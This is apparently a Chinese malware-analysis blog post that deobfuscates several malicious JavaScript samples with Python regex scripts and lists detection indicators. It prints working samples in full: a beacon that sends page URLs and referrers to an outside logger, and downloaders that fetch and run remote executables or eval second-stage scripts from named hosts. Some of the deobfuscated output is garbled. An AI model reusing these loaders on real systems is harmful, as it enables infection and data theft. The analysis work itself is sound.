Virus_JS3_PyAnalysisAndSummary
本篇是对JS样本做简单分析的第三篇,内容与前两篇有些重复,当作巩固吧.
0x1 Sample(TotalSamp_myself\Js–166x–63)
// Sample 63: string-table obfuscation. Every literal the code needs lives in _0x586f as
// \xHH escapes and is referenced by index. Decoded (the page's own output section shows the
// same table), the entries are:
//   0 "value"   1 "xKeyx"   2 "getElementById"   3 "URL"   4 "&"   5 "&amp;"   6 "replace"
//   7 "k"   8 "referrer"   9 "document"   10 "err"   11 "POST"
//  12 "http://logger.ysabel.eu/Logger.asmx"   13 "open"   14 "Content-Type"   15 "text/xml"
//  16 "setRequestHeader"   17 XML prologue   18 <soap:Envelope ...>   19 <soap:Body>
//  20 <LogData xmlns="http://ysabel.eu/">   21 <k>   22 </k>   23 <url>   24 "domain"
//  25 </url>   26 <ev>   27 </ev>   28-30 the matching closing tags   31 "send"   32 ""
//  33 '",'   34 '"' followed by a line break (as rendered on the page; probably a display
//     artefact -- confirm against the original file)   35 "DOMParser"   36 "parseFromString"
//  37 "Microsoft.XMLDOM"   38 "async"   39 "loadXML"   40 "nodeValue"   41 "childNodes"
//  42 "LogDataResult"   43 "getElementsByTagName"   44 "undefined"   45 "Microsoft.XMLHTTP"
//  46 "XMLHttpRequest not supported"
// Net effect: on page load it reads the value of element id "xKeyx" and POSTs a SOAP
// "LogData" request carrying that value, document.domain, document.URL and the top-frame
// referrer to the host in entry 12 -- a visitor beacon that exfiltrates browsing context.
// Detection: an outbound POST with Content-Type text/xml to that host from a page that has
// no business talking to it; the host name and the "xKeyx" element id are the IoCs.
var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22
","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
// k = document.getElementById("xKeyx").value -- the per-page token that is later sent in <k>.
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];
// Runs the beacon immediately; the function declaration below is hoisted so this works.
var visitorData= new visitorData(k);
// visitorData(key): collects document.URL ("&" -> "&amp;"), the key, and top.document.referrer
// (falls back to "err" when the top frame is cross-origin), then POSTs a SOAP LogData
// envelope <k>key</k><url>document.domain</url><ev>objToString(this)</ev> to entry 12.
function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;
// objToString(o): serialises o.URL, o.k and o.referrer as a quoted, comma-separated record
// using entries 33/34 as the separators; on any error only o.URL is returned.
function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;
// parseResponse(xml): parses the server reply with DOMParser (or Microsoft.XMLDOM on old IE)
// and returns the text of the first <LogDataResult>. Never called by the visible code;
// `parser` and `xmlDoc` leak as implicit globals. The page breaks the line after `return`,
// which would turn it into a bare return -- joined here, assuming a wrap artefact.
function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;
// CreateXMLHttpRequest(): native XMLHttpRequest, else ActiveXObject("Microsoft.XMLHTTP"),
// else throws "XMLHttpRequest not supported".
function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return new ActiveXObject(_0x586f[45]);} else {throw new Error(_0x586f[46]);} ;} ;} ;
0x2 py脚本
#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '063.JS.vir' #JsVirus文件OutPath = '63_analysis.txt' #提取到的文件myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'): logall = [] #print(InPath) if os.path.exists(InPath): f = codecs.open(InPath,ReadTye,'utf-8') #读入到list for line in f: if None == line: pass else: logall.append(line) f.close() return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典 #if os.path.exists(InPath): # pass #else: #要用全局变量把这里变成只写一次吗 global AuthorSign f = codecs.open(OutRePath,WriteTye,'utf-8') if AuthorSign == True: f.write('\n*****************************************************\r\n') f.write('* ahoo JsVirusAnalysis ') f.write('\n***************************************************\r\n\n') AuthorSign = False for i in findRe: f.write(i + '\n') f.close() return Truedef JSVirus_Parse(): #1.读取文件到LineList myJslog = ReadLogFile(PutPath) #print(myJslog) writeList_temp = [] writeList = [] #2.分为两部分处理. 
f586List = [] pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))') for line in myJslog: if '_0x586f=["' in line: #2.1 替换16进制-- for i in pattern_ascii.findall(line): #方法1 #line = line.replace(i[0], chr(int(i[1],16))) #方法2 pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])') line = pattern_temp.sub(chr(int(i[1],16)),line,count =1) print(line) writeList.append(line) #2.2 分割为数组 #line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&"];' #re.match(r"\[(.*)\]",line13[12:]).group(1) f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',') print(f586List) else: writeList_temp.append(line) #3.替换数组 #3.1查找所有数组 ''' for test line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];" print(line11) pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])') for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11): index = int(arrary) repStr = "*haha*" line11 = pattern_arrary.sub(repStr,line11,count=1) print(line11) ''' for line in writeList_temp: pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])') for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line): index = int(arrary) repStr = f586List[index] line = pattern_arrary.sub(repStr,line,count=1) #3.2替换分割的字符串+ plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') line = plus.sub('',line) writeList.append(line) #4 写入并打开文件 WriteResultFile(OutPath,writeList) os.system('notepad.exe ' + OutPath) print('The Virus has been analyzed,there is my advice! Thanks!') return Trueif __name__ == '__main__': JSVirus_Parse()
0x3 输出结果
做过美容的.var _0x586f=["value","xKeyx","getElementById","URL","&","&","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];var k = document["getElementById"]("xKeyx")["value"];var visitorData = new visitorData(k);function visitorData(_0xf4c7x3) { this["URL"] = document["URL"]["replace"]("&", "&"); this["k"] = _0xf4c7x3; try { this["referrer"] = top["document"]["referrer"]["replace"]("&", "&"); } catch (err) { this["referrer"] = "err"; }; var _0xf4c7x4 = CreateXMLHttpRequest(); _0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true); _0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml"); var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function 
parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return new ActiveXObject("undefined");} else {throw new Error("Microsoft.XMLHTTP");} ;} ;} ;
0x4 注意
[1]生成代码后做个美容(格式化)http://www.css88.com/tool/js_beautify/[2]正则测试工具(F:\RegTestTool.exe)
0x5下面做点扩充吧,js的都往后续…
0x5.1 Num25
// Sample Num25: a one-line WSH downloader. 'Shell.TrimiApplication'.replace('Trimi','')
// evaluates to "Shell.Application" only at run time, so the ProgID never appears literally
// (defeats naive string scanning). ShellExecute then runs PowerShell with show-state 0
// (hidden window) to download a binary from the URL below, save it under a .pif name and
// start it. Detection: wscript.exe/cscript.exe spawning powershell.exe whose command line
// contains DownloadFile and Start-Process; the URL and the dropped file name are the IoCs.
var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);
0x5.2 Num41
// Sample Num41: two-stage loader with a fallback host. For each of the two domains it
// issues a synchronous GET to /counter/?<token>; on HTTP 200 the body is split on the
// token and re-joined with "a" (presumably the server scatters the token through the
// payload as a placeholder -- confirm against a captured response) and the result is
// eval()'d. The first host that answers wins (break); the empty catch swallows every
// failure, so a dead first domain is silent. Note catch(e) shadows the request object e.
// Detection: wscript.exe making GET /counter/? requests to the listed domains; the second
// stage exists only in memory, so network capture or script-engine telemetry is where it
// becomes visible.
var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0";
var x = new Array("jaysonandfrisby.com","romiecoston.com");
var z1 = "Msxml2.XMLHTTP";
var z4 = "a";
for (var i=0; i<2; i++) {
  var e = new ActiveXObject(z1);
  try {
    e.open("GET", "http://"+x[i]+"/counter/?"+m, false);
    e.send();
    if (e.status == 200) {
      var z3 = e.responseText;
      var z3 = z3.split(m);
      var z3 = z3.join(z4);
      eval(z3);
      break;
    } ;
  } catch(e) { };
};
0x5.3 Num29
0x5.3.1样本
// Sample Num29: WSH downloader that evaluates a remote script. The escaped literals decode
// (see the page's output section) to "MSXML2.XMLHTTP", "GET",
// "https://dl-phdzmfjh.nl/p2e.js?" and 'downAndExec("pg6v");'. Math.random() is appended
// to the URL as a cache-buster. On HTTP 200 the response text is eval()'d with the call
// downAndExec("pg6v") appended, so the fetched script is expected to define downAndExec.
// The try/catch discards every failure. Detection: wscript.exe requesting that host; the
// second stage lives only in memory.
var random=function(){return Math.random()};
try{
  var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");
  objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);
  objHttp.Send();
  if(objHttp.Status== 200){
    eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")
  }
} catch(e){}
0x5.3.2Py代码
#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '029.JS.vir' OutPath = '29_analysis.txt' #提取到的文件.myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'): logall = [] #print(InPath) if os.path.exists(InPath): f = codecs.open(InPath,ReadTye,'utf-8') #读入到list for line in f: if None == line: pass else: logall.append(line) f.close() return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'): #后面可能改成词典 #if os.path.exists(InPath): # pass #else: #要用全局变量把这里变成只写一次吗 global AuthorSign f = codecs.open(OutRePath,WriteTye,'utf-8') if AuthorSign == True: f.write('\n*****************************************************\r\n') f.write('* ahoo JsVirusAnalysis ') f.write('\n***************************************************\r\n\n') AuthorSign = False for i in findRe: f.write(i + '\n') f.close() return Truedef JSVirus_Parse(): #1.读取文件到LineList myJslog = ReadLogFile(PutPath) #print(myJslog) writeList = [] pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))') for line in myJslog: for i in pattern_ascii.findall(line): #方法1 #line = line.replace(i[0], chr(int(i[1],16))) #方法2 pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])') line = pattern_tem.sub(chr(int(i[1],16)),line,count =1) print(line) writeList.append(line) #4 写入并打开文件 WriteResultFile(OutPath,writeList) os.system('notepad.exe ' + OutPath) print('The Virus has been analyzed,there is my advice! Thanks!') return Trueif __name__ == '__main__': JSVirus_Parse()
0x5.3.3输出
****************************************************** ahoo JsVirusAnalysis ***************************************************var random=function(){ return Math.random()};try{ var objHttp=WScript.CreateObject("MSXML2.XMLHTTP"); objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false); objHttp.Send();if(objHttp.Status== 200){ eval(objHttp.responseText+ "downAndExec("pg6v");")}}catch(e){}
0x6 小结
强调一点:复杂、看不懂的代码先美化(格式化),规律就好找多了.
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPath),ctrl+F2,bp UrlCanonicalizeA/W,F9.【调试】正则工具: F:\RegTestTool.exe【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)【代码美化-JS】http://www.css88.com/tool/js_beautify/【VB关键字】executeglobal(str) EXECUTE(str)【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line) 2.替换某一行中的所有符合条件 ''' for test line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];" print(line11) pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])') for arrary in re.findall('_0x586f\s*\[(\d{1,3})]',line11): index = int(arrary) repStr = "*haha*" line11 = pattern_arrary.sub(repStr,line11,count=1) print(line11) ''' 3.替换\x56为char ''' line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");' pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))') for i in pattern_ascii.findall(line): #方法1 #line = line.replace(i[0], chr(int(i[1],16))) #方法2 pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])') line = pattern_temp.sub(chr(int(i[1],16)),line,count =1) print(line) '''